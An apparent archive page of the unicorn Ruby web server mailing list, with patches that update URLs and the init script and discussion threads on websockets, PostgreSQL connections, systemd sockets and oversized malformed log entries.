@@ -78,9 +78,9 @@ You can follow along via NNTP:
 
 Or Atom feeds:
 
-	http://bogomips.org/unicorn-public/new.atom
+	https://bogomips.org/unicorn-public/new.atom
 
-	The HTML archives at http://bogomips.org/unicorn-public/
+	The HTML archives at https://bogomips.org/unicorn-public/
 	also has links to per-thread Atom feeds and downloadable
 	mboxes.
 
diff --git a/Links b/Links
index 6474a9d..7c113c8 100644
--- a/Links
+++ b/Links
@@ -26,7 +26,7 @@ or services behind them.
 * {raindrops}[http://raindrops.bogomips.org/] - real-time stats for
   preforking Rack servers
 
-* {UnXF}[http://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
+* {UnXF}[https://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
   useful since unicorn is designed to be deployed behind a reverse proxy.
 
 === unicorn is written to work with
@@ -52,5 +52,5 @@ or services behind them.
 * {Mongrel}[http://rubygems.org/gems/mongrel] - the awesome webserver
   unicorn is based on
 
-* {david}[http://bogomips.org/david.git] - a tool to explain why you need
+* {david}[https://bogomips.org/david.git] - a tool to explain why you need
   nginx in front of unicorn
diff --git a/README b/README
index 8079f37..29e04b4 100644
--- a/README
+++ b/README
@@ -82,7 +82,7 @@ You can get the latest source via git from the following locations
 
 You may browse the code from the web:
 
-* http://bogomips.org/unicorn.git
+* https://bogomips.org/unicorn.git
 * http://repo.or.cz/w/unicorn.git (gitweb)
 
 See the HACKING guide on how to contribute and build prerelease gems
@@ -128,7 +128,7 @@ All feedback (bug reports, user/development dicussion, patches, pull
 requests) go to the mailing list/newsgroup.  See the ISSUES document for
 information on the {mailing list}[mailto:unicorn-public@bogomips.org].
 
-The mailing list is archived at http://bogomips.org/unicorn-public/
+The mailing list is archived at https://bogomips.org/unicorn-public/
 Read-only NNTP access is available at:
 nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn and
 nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
diff --git a/SIGNALS b/SIGNALS
index 4d78065..1af851d 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -8,7 +8,7 @@ should be possible to easily share process management scripts between
 Unicorn and nginx.
 
 One example init script is distributed with unicorn:
-http://unicorn.bogomips.org/examples/init.sh
+https://bogomips.org/unicorn/examples/init.sh
 
 === Master Process
 
diff --git a/examples/big_app_gc.rb b/examples/big_app_gc.rb
index c4c8b04..9d05719 100644
--- a/examples/big_app_gc.rb
+++ b/examples/big_app_gc.rb
@@ -1,2 +1,2 @@
-# see {Unicorn::OobGC}[http://unicorn.bogomips.org/Unicorn/OobGC.html]
+# see {Unicorn::OobGC}[https://bogomips.org/unicorn/Unicorn/OobGC.html]
 # Unicorn::OobGC was broken in Unicorn v3.3.1 - v3.6.1 and fixed in v3.6.2
diff --git a/examples/nginx.conf b/examples/nginx.conf
index 0583c1f..e25712f 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -112,7 +112,7 @@ http {
     # try_files directive appeared in in nginx 0.7.27 and has stabilized
     # over time.  Older versions of nginx (e.g. 0.6.x) requires
     # "if (!-f $request_filename)" which was less efficient:
-    # http://bogomips.org/unicorn.git/tree/examples/nginx.conf?id=v3.3.1#n127
+    # https://bogomips.org/unicorn.git/tree/examples/nginx.conf?id=v3.3.1#n127
     try_files $uri/index.html $uri.html $uri @app;
 
     location @app {
diff --git a/examples/unicorn.conf.minimal.rb b/examples/unicorn.conf.minimal.rb
index 2a47910..2d1bf0a 100644
--- a/examples/unicorn.conf.minimal.rb
+++ b/examples/unicorn.conf.minimal.rb
@@ -1,9 +1,9 @@
 # Minimal sample configuration file for Unicorn (not Rack) when used
 # with daemonization (unicorn -D) started in your working directory.
 #
-# See http://unicorn.bogomips.org/Unicorn/Configurator.html for complete
+# See https://bogomips.org/unicorn/Unicorn/Configurator.html for complete
 # documentation.
-# See also http://unicorn.bogomips.org/examples/unicorn.conf.rb for
+# See also https://bogomips.org/unicorn/examples/unicorn.conf.rb for
 # a more verbose configuration using more features.
 
 listen 2007 # by default Unicorn listens on port 8080
diff --git a/examples/unicorn.conf.rb b/examples/unicorn.conf.rb
index 1e05cbb..d2897ef 100644
--- a/examples/unicorn.conf.rb
+++ b/examples/unicorn.conf.rb
@@ -2,10 +2,10 @@
 #
 # This configuration file documents many features of Unicorn
 # that may not be needed for some applications. See
-# http://unicorn.bogomips.org/examples/unicorn.conf.minimal.rb
+# https://bogomips.org/unicorn/examples/unicorn.conf.minimal.rb
 # for a much simpler configuration file.
 #
-# See http://unicorn.bogomips.org/Unicorn/Configurator.html for complete
+# See https://bogomips.org/unicorn/Unicorn/Configurator.html for complete
 # documentation.
 
 # Use at least one worker per core if you're on a dedicated server,
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 948c6e3..3329c10 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -3,11 +3,11 @@
 
 # Implements a simple DSL for configuring a unicorn server.
 #
-# See http://unicorn.bogomips.org/examples/unicorn.conf.rb and
-# http://unicorn.bogomips.org/examples/unicorn.conf.minimal.rb
+# See https://bogomips.org/unicorn/examples/unicorn.conf.rb and
+# https://bogomips.org/unicorn/examples/unicorn.conf.minimal.rb
 # example configuration files.  An example config file for use with
 # nginx is also available at
-# http://unicorn.bogomips.org/examples/nginx.conf
+# https://bogomips.org/unicorn/examples/nginx.conf
 #
 # See the link:/TUNING.html document for more information on tuning unicorn.
 class Unicorn::Configurator
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 741cca5..35bd100 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -6,7 +6,7 @@
 # forked worker children.
 #
 # Users do not need to know the internals of this class, but reading the
-# {source}[http://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
+# {source}[https://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
 # is education for programmers wishing to learn how unicorn works.
 # See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
-- 
EW

^ permalink raw reply related	[relevance 2%]

* Re: Please join the Rack Specification discussion for `env['upgrade.websocket']`
  @ 2016-08-06  3:09  3%   ` Boaz Segev
  0 siblings, 0 replies; 200+ results
From: Boaz Segev @ 2016-08-06  3:09 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Eric, thank you for your review and thoughts on the matter.

You raised a few questions, please allow me to both answer and clarify the intention behind the proposed extension.

>> I represent an effort to extend Rack so that it allows server-side
>> websocket upgrade implementation support and pure Rack websocket
>> applications.
>> 
>> This new Rack feature proposal is gaining support, with over 42
>> support votes in the [original Rack discussion
>> thread](https://github.com/rack/rack/issues/1093).
> 
> You mention performance several times, but I am not sure what
> you mean.  unicorn completely stops caring for a socket after
> it's hijacked by the app.  In other words:
> 
>  Your Rack app could take the socket and inject it into an
>  event loop running in a separate thread.  That event loop
>  could be 100% C code running without GVL for all unicorn
>  cares.


Running two (or more) event loops, each with it's own resources, is wasteful and promotes needless context switches.

There is no reason to hijack a socket when the server can easily provide callbacks for IO related events using it's existing established event loop.

This alone should provide a performance boost. There are other considerations as well, but I think they all derive from this core principle of having the web server retain control over all network IO concerns.

> Also, Ruby IO.select also supports arbitrary number of
> descriptors in some cases (Linux for sure, and probably most
> server-oriented *BSDs).  Of course, the malloc usage + O(n)
> behavior still suck, but no, select(2) is not always limited to
> <=1024 FDs.


Although this isn't as relevant to the proposed specification, it is a good example for how intricate network programming details are unknown by most Ruby programmers and shows why it would be better for the web server to retain control over all network IO concerns.

For example, the Linux man page expressly states that "To monitor file descriptors greater than 1023, use poll(2) instead"

This is true even when using select for a single FD that has a value of more then 1023, since `select` is often implemented using a bit vector map of 1024 bits that are controlled using the FD_(*) macros.

See, for example: http://linux-tips.org/t/is-it-possible-to-listen-file-descriptor-greater-than-1024-with-select/45/2

Ruby's IO.select uses this same system call and suffers the same issues that are present in the OS - each OS with it's own quirks.

I don't think application developers should worry about these details when these issues were already resolved during the server's designed.

By having the server provide callbacks - instead of hijacking - we eliminate a hoard of potential bugs and considerations.

>  unicorn would only parse the first HTTP request (with the
>  Upgrade header) before the Rack app hijacks it.


Of course, not every server has to offer this feature - just like hijacking, it's optional.

Unicorn was design for very specific use cases, so I definitely understand if this might not be as interesting for you. 

However, I do think your experience as developers could help enrich us all. If you have any comments or anything to add regarding the proposed `websocket.upgrade` specification, your voice is welcome:

https://github.com/boazsegev/iodine/issues/6



^ permalink raw reply	[relevance 3%]

* [PATCH] examples/init.sh: update to reduce upgrade raciness
  @ 2016-06-07 21:13 10%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-06-07 21:13 UTC (permalink / raw)
  To: Jesper Rønn-Jensen; +Cc: unicorn-public

Jesper Rønn-Jensen <jesperrr@gmail.com> wrote:
> On Tue, Jun 7, 2016 at 3:41 PM, Eric Wong <e@80x24.org> wrote:
> > Jesper Rønn-Jensen <jesperrr@gmail.com> wrote:
> >> +++ b/examples/init.sh
> >> @@ -45,7 +45,7 @@ restart|reload)
> >>   $CMD
> >>   ;;
> >>  upgrade)
> >> - if sig USR2 && sleep 2 && sig 0 && oldsig QUIT
> >> + if sig USR2 && sleep 2 && sig 0
> >>   then
> >>   n=$TIMEOUT
> >>   while test -s $old_pid && test $n -ge 0
> >> --
> >
> > I actually wrote a better init script for a similar server,
> > patch coming in a bit (or later, close to falling asleep).
>
> Thanks for input.
> 
> I will close this issue and wait for your patch later, then.
 
Proposed patch below (for "git am --scissors" users)
I've pushed this out to the "jr/init" branch on the git repo
and you can download the blob directly, here:

https://bogomips.org/unicorn.git/plain/examples/init.sh?h=jr/init

Will rebase/amend this branch as necessary until merged into master.

> Will also close pull-request I put at github with reference to this thread.

Please do, thank you.

Their terms-of-service doesn't allow bots to auto-close and redirect
things; and I can't support any centralized messaging system.

> >         Anyways if you stick to old-school Usenet/mailing list posting
> >         conventions, I'm more than happy to help you :)
 
> PS. Thanks for tip on HTML vs Plain text mails. Didn't know Gmail
> could send plain text :)

I think the only problem with gmail I've heard was from mobile
phone app users.  At least the git ML and LKML gets text-only
gmail posts all the time.

We old-school conventions mean we also trim our quotes and
avoid top-posting :)

------------8<----------------
Subject: [PATCH] examples/init.sh: update to reduce upgrade raciness
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Rework the "upgrade" target to only read the PID files once to
avoid misreading the wrong PID files in the middle of the
upgrade.

Additionally, introduce the UPGRADE_DELAY environment parameter
so users can increase/decrease according to their application
startup time.

PID files are inherently racy and people should be using a
process manager (systemd or similar) instead, but this should
mitigate most of the problems with the old target.

While we're at it, add LSB tags for systems which complain
about the lack of them and modernize things a bit using
$(command) construct instead of the more fragile `command`.

Thanks-to: Jesper Rønn-Jensen <jesperrr@gmail.com>
---
 examples/init.sh | 44 ++++++++++++++++++++++++++++++++++++--------
 1 file changed, 36 insertions(+), 8 deletions(-)

diff --git a/examples/init.sh b/examples/init.sh
index 1f0e035..4ef6cdc 100644
--- a/examples/init.sh
+++ b/examples/init.sh
@@ -1,7 +1,16 @@
 #!/bin/sh
 set -e
+### BEGIN INIT INFO
+# Provides:          unicorn
+# Required-Start:    $local_fs $network
+# Required-Stop:     $local_fs $network
+# Default-Start:     2 3 4 5
+# Default-Stop:      0 1 6
+# Short-Description: Start/stop unicorn Rack app server
+### END INIT INFO
+
 # Example init script, this can be used with nginx, too,
-# since nginx and unicorn accept the same signals
+# since nginx and unicorn accept the same signals.
 
 # Feel free to change any of the following variables for your app:
 TIMEOUT=${TIMEOUT-60}
@@ -9,21 +18,22 @@ APP_ROOT=/home/x/my_app/current
 PID=$APP_ROOT/tmp/pids/unicorn.pid
 CMD="/usr/bin/unicorn -D -c $APP_ROOT/config/unicorn.rb"
 INIT_CONF=$APP_ROOT/config/init.conf
+UPGRADE_DELAY=${UPGRADE_DELAY-2}
 action="$1"
 set -u
 
 test -f "$INIT_CONF" && . $INIT_CONF
 
-old_pid="$PID.oldbin"
+OLD="$PID.oldbin"
 
 cd $APP_ROOT || exit 1
 
 sig () {
-	test -s "$PID" && kill -$1 `cat $PID`
+	test -s "$PID" && kill -$1 $(cat $PID)
 }
 
 oldsig () {
-	test -s $old_pid && kill -$1 `cat $old_pid`
+	test -s "$OLD" && kill -$1 $(cat $OLD)
 }
 
 case $action in
@@ -45,18 +55,36 @@ restart|reload)
 	$CMD
 	;;
 upgrade)
-	if sig USR2 && sleep 2 && sig 0 && oldsig QUIT
+	if oldsig 0
+	then
+		echo >&2 "Old upgraded process still running with $OLD"
+		exit 1
+	fi
+
+	cur_pid=
+	if test -s "$PID"
+	then
+		cur_pid=$(cat $PID)
+	fi
+
+	if test -n "$cur_pid" &&
+			kill -USR2 "$cur_pid" &&
+			sleep $UPGRADE_DELAY &&
+			new_pid=$(cat $PID) &&
+			test x"$new_pid" != x"$cur_pid" &&
+			kill -0 "$new_pid" &&
+			kill -QUIT "$cur_pid"
 	then
 		n=$TIMEOUT
-		while test -s $old_pid && test $n -ge 0
+		while kill -0 "$cur_pid" 2>/dev/null && test $n -ge 0
 		do
 			printf '.' && sleep 1 && n=$(( $n - 1 ))
 		done
 		echo
 
-		if test $n -lt 0 && test -s $old_pid
+		if test $n -lt 0 && kill -0 "$cur_pid" 2>/dev/null
 		then
-			echo >&2 "$old_pid still exists after $TIMEOUT seconds"
+			echo >&2 "$cur_pid still running after $TIMEOUT seconds"
 			exit 1
 		fi
 		exit 0
-- 
EW

^ permalink raw reply related	[relevance 10%]

* Re: Dead PostgreSQL connections on worker restart
  @ 2016-04-15  5:42  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-04-15  5:42 UTC (permalink / raw)
  To: Adam Fields; +Cc: unicorn-public

Adam Fields <unicorn5958@street86.com> wrote:
> We have discovered that every time a unicorn worker is restarted,
> rails throws "PG::ConnectionBad: connection is closed” errors.

<snip>

> We are using preload: true, and have before and after fork
> rules to close and reopen the connections:

<snip>

> before_fork do |server, worker|
>  defined?(ActiveRecord::Base) and
>      ActiveRecord::Base.connection.disconnect!

<snip>

> Yet it seems that something is holding onto a dead connection
> and trying to use it. 

I'm not familiar with the Rails side anymore, so hopefully
others can chime in.  However, from the OS perspective,
it's generic and not dependent on Ruby or Pg, just *nix...

> How can we troubleshoot this?

Use lsof to determine which sockets are shared.
lsof should be available and common on most platforms,
definitely Linux-based ones.

	lsof -p $PID_OF_MASTER
	lsof -p $PID_OF_WORKER

And compare the sockets shared between the processes based on
the output of lsof.  I'm mostly going off Linux lsof output,
here, but the idea is the same across all *nixes...

Sockets marked as "LISTEN" are intended to be shared by unicorn.
(UDP and other packet-oriented so sockets are fine to share, too;
 but most apps don't use them)

If your Pg connection is over TCP, look for TCP sockets
in the ESTABLISHED state and ensure each process has
a unique number in the DEVICE column (and/or local port).

Likewise if your Pg connection is over a Unix socket.  Just make
sure the path is the correct one (to distinguish from any Unix
sockets unicorn listens on).

In other words, no stream-oriented connections you make should
be shared.  There probably shouldn't be any stream-oriented
connections in your master process at all.

^ permalink raw reply	[relevance 2%]

* Re: Systemd socket inheritance fails with “not a socket file descriptor”
  2016-03-09  3:51  0%         ` Eric Wong
  2016-03-09 13:19  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” [take2] Christos Trochalakis
@ 2016-03-09 14:06  0%           ` Christos Trochalakis
  1 sibling, 0 replies; 200+ results
From: Christos Trochalakis @ 2016-03-09 14:06 UTC (permalink / raw)
  To: Eric Wong; +Cc: Amir Yalon, unicorn-public

On Wed, Mar 09, 2016 at 03:51:57AM +0000, Eric Wong wrote:
>Amir Yalon <amiryal@yxejamir.net> wrote:
>> Yes, everything looks as expected, one inherited socket starting at fd
>> number 3:
>>
>> I=[3] PID=4869 FDS=1
>>
>> Also tried with Ruby 2.2.1, same results.  FWIW, my rubies are compiled
>> by system-wide RVM with no special options given to it.
>
>Interesting.   Can you try using some other non-Ruby daemon
>which uses sd_listen_fds, too?   I can't think of any off
>the top of my head, but I'm sure there's some.
>
>It seems like systemd is mis-setting FD_CLOEXEC on socket,
>even.
>

Ok, this is my theory, systemd correctly passes the sockets and the
environment to the process, but Amir is using rvm which probably runs
one more exec than usual. In this extra step rvm/ruby closes the fds for
security reasons but the ENV variables remain. In the newly forked ruby
process the timer gets fd=3 (which is now consider internal) and when
unicorn tries to example fd=3 breaks.


^ permalink raw reply	[relevance 0%]

* Re: Systemd socket inheritance fails with “not a socket file descriptor” [take2]
  2016-03-09  3:51  0%         ` Eric Wong
@ 2016-03-09 13:19  0%           ` Christos Trochalakis
  2016-03-09 14:06  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” Christos Trochalakis
  1 sibling, 0 replies; 200+ results
From: Christos Trochalakis @ 2016-03-09 13:19 UTC (permalink / raw)
  To: Eric Wong; +Cc: Amir Yalon, unicorn-public

On Wed, Mar 09, 2016 at 03:51:57AM +0000, Eric Wong wrote:
>Amir Yalon <amiryal@yxejamir.net> wrote:
>> Yes, everything looks as expected, one inherited socket starting at fd
>> number 3:
>>
>> I=[3] PID=4869 FDS=1
>>
>> Also tried with Ruby 2.2.1, same results.  FWIW, my rubies are compiled
>> by system-wide RVM with no special options given to it.
>
>Interesting.   Can you try using some other non-Ruby daemon
>which uses sd_listen_fds, too?   I can't think of any off
>the top of my head, but I'm sure there's some.
>
>It seems like systemd is mis-setting FD_CLOEXEC on socket,
>even.
>
>> Thanks for taking the time to investigate, really appreciated.
>
>No problem.  I wonder if something else is broken in your systemd
>config...
>
>Again, I'll take a harder look at newer systemd later this week
>unless somebody beats me to it.

I was also unable to reproduce it in:

* debian stretch, ruby2.2 / systemd 229
* ubuntu wily, ruby2.{1,2} / systemd 225

I used system rubies for all the experments, not rvm.

Amir, could you also send us for completeness your unicorn config and
the output of systemctl cat unicorn.socket & systemctl cat
unicorn@1.service ?

^ permalink raw reply	[relevance 0%]

* Re: Systemd socket inheritance fails with “not a socket file descriptor”
  2016-03-08 20:32  3%       ` Amir Yalon
@ 2016-03-09  3:51  0%         ` Eric Wong
  2016-03-09 13:19  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” [take2] Christos Trochalakis
  2016-03-09 14:06  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” Christos Trochalakis
  0 siblings, 2 replies; 200+ results
From: Eric Wong @ 2016-03-09  3:51 UTC (permalink / raw)
  To: Amir Yalon; +Cc: unicorn-public

Amir Yalon <amiryal@yxejamir.net> wrote:
> Yes, everything looks as expected, one inherited socket starting at fd
> number 3:
> 
> I=[3] PID=4869 FDS=1
> 
> Also tried with Ruby 2.2.1, same results.  FWIW, my rubies are compiled
> by system-wide RVM with no special options given to it.

Interesting.   Can you try using some other non-Ruby daemon
which uses sd_listen_fds, too?   I can't think of any off
the top of my head, but I'm sure there's some.

It seems like systemd is mis-setting FD_CLOEXEC on socket,
even.

> Thanks for taking the time to investigate, really appreciated.

No problem.  I wonder if something else is broken in your systemd
config...

Again, I'll take a harder look at newer systemd later this week
unless somebody beats me to it.

^ permalink raw reply	[relevance 0%]

* Re: Systemd socket inheritance fails with “not a socket file descriptor”
  @ 2016-03-08 20:32  3%       ` Amir Yalon
  2016-03-09  3:51  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Amir Yalon @ 2016-03-08 20:32 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> How many sockets are you activating? LISTEN_FDS should match
> that number.

I am “activating” only 1 socket, and the error is seen with both a TCP
and a UNIX type socket.

> Can you dump out the inherited, and LISTEN_* env variables with
> the following?

Yes, everything looks as expected, one inherited socket starting at fd
number 3:

I=[3] PID=4869 FDS=1

Also tried with Ruby 2.2.1, same results.  FWIW, my rubies are compiled
by system-wide RVM with no special options given to it.

Thanks for taking the time to investigate, really appreciated.

Regards,
Amir

^ permalink raw reply	[relevance 3%]

* Re: unicorn log attack?
  2016-01-30  9:34  0% ` unicorn log attack? Eric Wong
@ 2016-02-01  5:04  2%   ` Lawrence Pit
  0 siblings, 0 replies; 200+ results
From: Lawrence Pit @ 2016-02-01  5:04 UTC (permalink / raw)
  To: unicorn-public

Hi Eric,

> but that includes emails :)

Yeah, sorry about the email format :[  Hope this time it's as expected.

> Since the backtrace below clearly shows the error happened from
> something your application was doing;

.. if you count ruby MRI and rack as my application. ;) All this
happens way before it touches what I would call my application. But
yes, I could insert my own middleware before the first rack middleware
and deal with it.

> I don't consider it the responsibility of the app server to sanitize it.

fwiw, I agree :) ... similarly, why consider it the responsibility of
the app server to log it?  it is an application level error, not a
unicorn error.

Rack's spec doesn't state how to deal with exceptions in return to
@app.call. Python's PEP 0333 says a bit more, along the lines of that
applications should try to trap their own, internal errors. I'll go
for that then.


PS.

> In ancient times (perhaps it was the Mongrel days), the server
> itself would dump the contents of bad HTTP requests for
> debugging; but given the amount of probes/scans I saw: it wasn't
> worth it.  We don't even log things like aborted/dropped
> connections.

Yes, nice. :)

The request I'm seeing is also a bad HTTP request (invalid
%-encoding). To illustrate:

curl -v -X POST "http://localhost:8080/?foo=bar%0abaz%xx"

will have unicorn responds with a 400 Bad Request, handling
Unicorn::HttpParserError. The request doesn't enter @app.call(...).
And indeed unicorn doesn't even bother logging anything about this
request.

When sending the same thing as form data:

curl -v -X POST -d "foo=bar%0abaz%xx" "http://localhost:8080/"

then this will result in a 500 error and unicorn will log the posted
value and stacktrace (provided Rack::Request.new(env).POST is called
anywhere and @app doesn't trap its own errors):

app error: invalid %-encoding (bar%0abaz%xx)
(Rack::Utils::InvalidParameterError)


Cheers,
Lawrence

^ permalink raw reply	[relevance 2%]

* Re: unicorn log attack?
       [not found]     <56AAAD0A.8000807@icloud.com>
@ 2016-01-30  9:34  0% ` Eric Wong
  2016-02-01  5:04  2%   ` Lawrence Pit
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2016-01-30  9:34 UTC (permalink / raw)
  To: Lawrence Pit; +Cc: unicorn-public

Lawrence Pit <lawrencepit@icloud.com> wrote:
> Hi Eric,
> 
> I'm writing to you directly instead of to the unicorn-public list.

Which got your HTML email tarpitted in my spam folder instead of
being bounced back right away so you could fix it :)

> I noticed yesterday our unicorn.log files, which are usually tiny,
> were gigantic in size. Fortunately, this was caused by a friendly
> attack, but had they persisted I think we would've run out of
> diskspace (of which we would've been warned in advance, so we
> could've dealt with the situation I suppose had it happened)
> 
> Upon inspection it seems requests were received as shown below (
> I've cut out the middle part of the value that was part of the form
> body that was posted )
> 
> The log statement is printed out by unicorn.rb method +log_error+.
> 
> I'm not sure this is a unicorn issue, and thinking more an issue of
> how we developers should deal with repeatedly receiving the same
> sort of (sometimes very large) exceptions? Any advice?

Right, not a unicorn issue :)

Use logrotate or similar, compress your logs frequently, be
mindful of what you dump from your app; and watch your disk
usage (which you seem to be doing already), but that includes
emails :)

In ancient times (perhaps it was the Mongrel days), the server
itself would dump the contents of bad HTTP requests for
debugging; but given the amount of probes/scans I saw: it wasn't
worth it.  We don't even log things like aborted/dropped
connections.

Since the backtrace below clearly shows the error happened from
something your application was doing; I don't consider it the
responsibility of the app server to sanitize it.

> ps. if you want to reply via the list that's fine by me.

Done :) but I've shortened the backtrace for readability

> E, [2016-01-26T11:23:49.499928 srv23 28932] unicorn: app error:
> invalid %-encoding (stri%26%23%30%30%32%

<snip>

> [ CUT VERY LARGE VALUE ]

<snip :>

> (ArgumentError)
> /usr/local/lib/ruby/2.2.0/uri/common.rb:382:in
> `decode_www_form_component'
> /rack-1.5.5/lib/rack/utils.rb:42:in
> `unescape'
> /rack-1.5.5/lib/rack/utils.rb:105:in
> `block (2 levels) in parse_nested_query'

<snip>  These definitely aren't called from code in unicorn itself.

> /rack-1.5.5/lib/rack/urlmap.rb:50:in
> `each'
> /rack-1.5.5/lib/rack/urlmap.rb:50:in
> `call'
> /unicorn-5.0.1/lib/unicorn/http_server.rb:562:in
> `process_client'
> /unicorn-5.0.1/lib/unicorn/oob_gc.rb:70:in
> `process_client'
> /unicorn-5.0.1/lib/unicorn/http_server.rb:658:in
> `worker_loop'

^ permalink raw reply	[relevance 0%]

* [PUSHED] various documentation updates
@ 2016-01-07  3:41  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-01-07  3:41 UTC (permalink / raw)
  To: unicorn-public

* add nntp_url to the olddoc website footer
* update legacy support status for 4.x (not 4.8.x)
* update copyright range to 2016
* note all of our development tools are Free Software, too
* remove cgit mention; it may not always be cgit
  (but URLs should remain compatible).
* discourage downloading snapshot tarballs;
  "git clone" + periodic "git fetch" is more efficient
* remove most mentions of unicorn_rails as that
  was meant for ancient Rails 1.x/2.x users
* update path reference to Ruby 2.3.0
* fix nginx upstream module link to avoid redirect
* shorten Message-ID example to avoid redirects
  and inadvertant linkage
---
  Also pushed to the website http://unicorn.bogomips.org/
  (using olddoc.git @ c98abe82b6b3 from git://80x24.org/olddoc.git)

  Curious, does anybody out there use Rails 2.x or earlier?

 .olddoc.yml                       |  1 +
 Documentation/unicorn.1.txt       |  1 -
 Documentation/unicorn_rails.1.txt |  2 +-
 HACKING                           |  2 +-
 README                            | 17 +++++------------
 lib/unicorn/configurator.rb       |  5 +++--
 lib/unicorn/http_server.rb        |  4 ++--
 7 files changed, 13 insertions(+), 19 deletions(-)

diff --git a/.olddoc.yml b/.olddoc.yml
index 063c1c6..cda8ac3 100644
--- a/.olddoc.yml
+++ b/.olddoc.yml
@@ -13,3 +13,4 @@ noindex:
 - unicorn_rails_1
 public_email: unicorn-public@bogomips.org
 private_email: unicorn@bogomips.org
+nntp_url: nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
diff --git a/Documentation/unicorn.1.txt b/Documentation/unicorn.1.txt
index efdda4b..3f20a9a 100644
--- a/Documentation/unicorn.1.txt
+++ b/Documentation/unicorn.1.txt
@@ -175,7 +175,6 @@ the unicorn config file.
 
 # SEE ALSO
 
-* unicorn_rails(1)
 * *Rack::Builder* ri/RDoc
 * *Unicorn::Configurator* ri/RDoc
 * [Unicorn RDoc][1]
diff --git a/Documentation/unicorn_rails.1.txt b/Documentation/unicorn_rails.1.txt
index bff703e..2ce7501 100644
--- a/Documentation/unicorn_rails.1.txt
+++ b/Documentation/unicorn_rails.1.txt
@@ -4,7 +4,7 @@
 
 # NAME
 
-unicorn_rails - a script/server-like command to launch the Unicorn HTTP server
+unicorn_rails - unicorn launcher for Rails 1.x and 2.x users
 
 # SYNOPSIS
 
diff --git a/HACKING b/HACKING
index 6c5f897..0fa22cd 100644
--- a/HACKING
+++ b/HACKING
@@ -57,7 +57,7 @@ Please wrap documentation at 72 characters-per-line or less (long URLs
 are exempt) so it is comfortably readable from terminals.
 
 When referencing mailing list posts, use
-"http://bogomips.org/unicorn-public/m/$MESSAGE_ID.html" if possible
+<tt>http://bogomips.org/unicorn-public/$MESSAGE_ID/</tt> if possible
 since the Message-ID remains searchable even if a particular site
 becomes unavailable.
 
diff --git a/README b/README
index db9f0d4..11de938 100644
--- a/README
+++ b/README
@@ -13,7 +13,7 @@ both the the request and response in between unicorn and slow clients.
   {nginx}[http://nginx.org/] or {Rack}[http://rack.github.io/].
 
 * Compatible with Ruby 1.9.3 and later.
-  unicorn 4.8.x will remain supported for Ruby 1.8 users.
+  unicorn 4.x remains supported for Ruby 1.8 users.
 
 * Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
@@ -60,7 +60,7 @@ both the the request and response in between unicorn and slow clients.
 
 == License
 
-unicorn is copyright 2009 by all contributors (see logs in git).
+unicorn is copyright 2009-2016 by all contributors (see logs in git).
 It is based on Mongrel 1.1.5.
 Mongrel is copyright 2007 Zed A. Shaw and contributors.
 
@@ -68,7 +68,7 @@ unicorn is licensed under (your choice) of the GPLv2 or later
 (GPLv3+ preferred), or Ruby (1.8)-specific terms.
 See the included LICENSE file for details.
 
-unicorn is 100% Free Software.
+unicorn is 100% Free Software (including all development tools used).
 
 == Install
 
@@ -85,10 +85,9 @@ You can get the latest source via git from the following locations
   git://bogomips.org/unicorn.git
   git://repo.or.cz/unicorn.git (mirror)
 
-You may browse the code from the web and download the latest snapshot
-tarballs here:
+You may browse the code from the web:
 
-* http://bogomips.org/unicorn.git (cgit)
+* http://bogomips.org/unicorn.git
 * http://repo.or.cz/w/unicorn.git (gitweb)
 
 See the HACKING guide on how to contribute and build prerelease gems
@@ -102,12 +101,6 @@ In APP_ROOT, run:
 
   unicorn
 
-=== Ancient Rails 1.2 - 2.x versions
-
-In RAILS_ROOT, run:
-
-  unicorn_rails
-
 unicorn will bind to all interfaces on TCP port 8080 by default.
 You may use the +--listen/-l+ switch to bind to a different
 address:port or a UNIX socket.
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 4da19bb..948c6e3 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -181,8 +181,6 @@ def before_exec(*args, &block)
   # to have nginx always retry backends that may have had workers
   # SIGKILL-ed due to timeouts.
   #
-  #    # See http://wiki.nginx.org/NginxHttpUpstreamModule for more details
-  #    # on nginx upstream configuration:
   #    upstream unicorn_backend {
   #      # for UNIX domain socket setups:
   #      server unix:/path/to/.unicorn.sock fail_timeout=0;
@@ -192,6 +190,9 @@ def before_exec(*args, &block)
   #      server 192.168.0.8:8080 fail_timeout=0;
   #      server 192.168.0.9:8080 fail_timeout=0;
   #    }
+  #
+  # See http://nginx.org/en/docs/http/ngx_http_upstream_module.html
+  # for more details on nginx upstream configuration.
   def timeout(seconds)
     set_int(:timeout, seconds, 3)
     # POSIX says 31 days is the smallest allowed maximum timeout for select()
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index ca56ed3..741cca5 100644
--- a/lib/unicorn/http_server.rb
